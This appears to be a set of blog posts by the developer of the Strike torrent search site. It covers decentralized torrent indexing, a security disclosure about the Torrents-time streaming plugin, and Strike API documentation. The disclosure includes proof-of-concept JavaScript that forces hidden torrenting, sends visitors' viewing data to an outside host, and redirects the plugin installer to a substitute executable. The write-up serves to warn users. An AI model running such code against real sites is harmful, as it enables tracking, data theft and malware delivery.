#torrents
When I shut down Strike last December, millions of users lost their go-to media site, developers who relied on my API lost access to the data, and everyone was left with the all too familiar thought of, “what now?”
P2P file sharing services collectively suffer from the issue of monetization. Every new torrent tracker on the scene seems to be yet another end-all-be-all centralized source for content. Over time, everyone begins to rely on these sites, they grow larger and larger, the operators make a lot of money, eventually the MPAA or ███ gets angry and has the owners arrested and the site shut down, and the cycle begins anew.
With Strike I attempted to do something new: a torrent search engine that didn’t present you with ads or sponsored content, and instead simply gave the user the ability to find information. Because I had no motivations of profit from it, I was able to make the data free and open for anyone to use, but it still suffered from the issue of being centralized.
For Strike’s final (and abandoned) version, I created a prototype that solved this issue; by creating software that runs on a local system and crawls DHT for infohashes, it cuts out the need for an HTTP-based solution. By writing software that indexes file information into a full-text searchable format, you’ve already solved the problem. While this process can be slow, the data set grows over time, and you can ensure that the data remains fresh by monitoring active swarms.
The key to healthy growth, no matter the subject, is to keep development simple. A server counterpart to this should only do a couple of things:
- Collect file information from hashes
- Query said data
- Allow plugins to handle said data
By creating the means to collect and parse the data, you’ve done your part. The plugin system means its up for developers to handle the data however they wish. This results in the community constantly creating new solutions to problems and a strive for innovation.
Imagine that someone creates a plugin that allows you to connect to another person or another community’s database, where you can then search for things in both datasets and merge the two. While this would be possible with a plugin-enabled centralized community, users would know that they will always have the same data available to them at all times.
It’s time we said good bye to the traditional trackers and became self-reliant. So long as torrent trackers remain malware-infested hubs with top 100 lists, we are never going to see P2P’s image as a piracy haven begin to heal.
Thanks for reading,
What is Torrents-time
A “new” method of streaming torrents in your web browser, based around existing technologies Torrents-time was quickly adopted by a majority of torrent sites due to its ability to embed a player on the page to stream video content from torrents.
Tear down
Torrents-time bind the following ports
- 8082:nodejs webserver
- 12400:main application
- 9220:web socket server
Exposed API
- https://localhost.ttconfig.xyz:12400/api.js
- https://127.0.0.1:12400/api.js - leads to a insecure https connection, it listens for request.
- https://localhost.ttconfig.xyz:12400/vpnpropmt?version=r1 - block this and all things related to it. Anonymous VPN are very untrustworthy and make you the product.
3rd parties being called (why would you do this)
- 1337.to
- moviedb
- anonymousvpn
Profiting from VPN “partnership”, trusting a random VPN service is a writeup for another day.
Attack Vectors
This service stupidly abuses CORS, even worse it exposes a CORS enabled XHR object after requesting an instance of the plugin. So lets take advantage of that.
We don’t need anything more to do this attack than
<html> <title>Hello World</title> <head lang="en"> <script src="torrents.js"></script> <script src="https://localhost.ttconfig.xyz:12400/api.js"></script> <script src="attack.js"></script> <meta charset="UTF-8"> <title></title> </head> <body> </body> </html>
Where torrents.js is their CDN code, once we have the first two scripts loaded attack.js can make use of all of torrentsTime useful functions on any page.
So in a few seconds we can get torrentTime on any HTML5 page, that’s great!
Except now I’m free to do a few things.
Concern 1 - Forced Piracy
Because I can make an invisible player, I’m free to force you to torrent whatever I like, even if you had no intention of streaming said content with a line of code
torrentsTime.instances.i0.start();
Great, you were just forced to torrent illegal content insecurely. You can do this for an unlimited amount of content. I can use any publisher ID as well.
Concern 2 - User Tracking/Privacy
Lets say I’m an advertiser/group with access to javascript on a website, with a few lines of code, not only can I tell who you are, I can send all that data using torrentsTime very exposed xhr object.
function driveBy() { //Torrents-time detected! //i0 is the first instance, loop over instances to get all currently started torrents var torrentTitle = torrentsTime.instances.i0.setup.title; var browser = torrentsTime.instances.i0.setup.browser; var filetype = torrentsTime.instances.i0.setup.fileType; //any other code we want to do on the page //this supports callback/JSONP //use the exposed xhr torrentsTime.utils.xhr("https://andrew.im/sandbox/tracktt.php?title=" + torrentTitle + "&browser=" + browser + "&filetype=" +filetype, callback); } function callback(data) { console.log(data); }
Instant results
Concern 3 - Even more privacy issues
Every time you make a request to the CDN the following data is logged by Torrents-time servers
IP, location (country), user agent, cookies, and and likely the exact page you requested the CDN from. Further more within the C code you can see the use of private keys masking SOMETHING which does indeed make http request, I’ve yet to break this.
Concern 4 - It runs as root on OSX
It runs as root on OSX. I really don’t need to say more.
Concern 5 - Redirect Plugin DownloadX
Redirecting the download for the plugin is again only a single line of code torrentsTime.setup.installerURL.windows = "https://andrew.im/sandbox/torrentsTime-download.exe";
After that you just fire torrentsTime.downloadInstaller();
Or when a user clicks the plugin download, they will be greeted with a legit looking prompt
Concern 6 - XSS
Seems just about every site with TT installed is vunerable to XSS now.
PiratebayConcern 7 - Sky rocket cpu usage/crash it
Literally just ping the server with 1024 bytes and the cpu usage stays between 50% and 80%, no idea why this one even occurs. Program later crashes when sending random strings, so possible bufferoverflow waiting to be exploited.
Concern 8 - Bundled Certs
includes the private keys to their for ‘encrypted’ comms channel. Details here UPDATE their cert for localhost has been revoked.
Resources
You can download Torrents-time c-code here, as well as all the NODEJS used on your computer
https://mega.nz/#F!pklQQChQ!1VCTBgQQ9ticT8rm_TzGRw
Threat level
Seriously, remove this software from your computer, if you put it on your site, remove it, if you think about adding it, don’t. More exploits coming soon!
Even more info written by /u/thecodingdude can be found on RedditContact
Andrew Sampson
- @Andrewmd5
- Email: [email protected]
I implore Congress to amend the statute to reflect the realities of file sharing. There is something wrong with a law that routinely threatens teenagers and students with astronomical penalties for an activity whose implications they may not have fully understood. The injury to the copyright holder may be real, and even substantial, but, under the statute, the record companies do not even have to prove actual damage.
In the US courts its not about who is right or wrong, people can judge this for themselves, its about how much money can you spend. My only fear is that this lawsuit opens up other websites and services to attack. Aurous operated in the blind, our client just allowed people to utilize the API’s of 3rd party websites (YouTube, Soundcloud), even then look where we ended up.
https://getstrike.net/api/torrents/top/?category=all
You can get the top 100 for a category
for example anime would be
https://getstrike.net/api/torrents/top/?category=Anime
Here is a list of all valid categories
Anime
Applications
Books
GamesHD Video Deprecated
Movies
Music
Other
TV
XXX
Once the new API/Core engine rewrites come (sometime after I move) you’ll have a ton more filtering options, so don’t worry. this will include sub categories and what not.
Enjoy. index will be updated once an hour just like everything else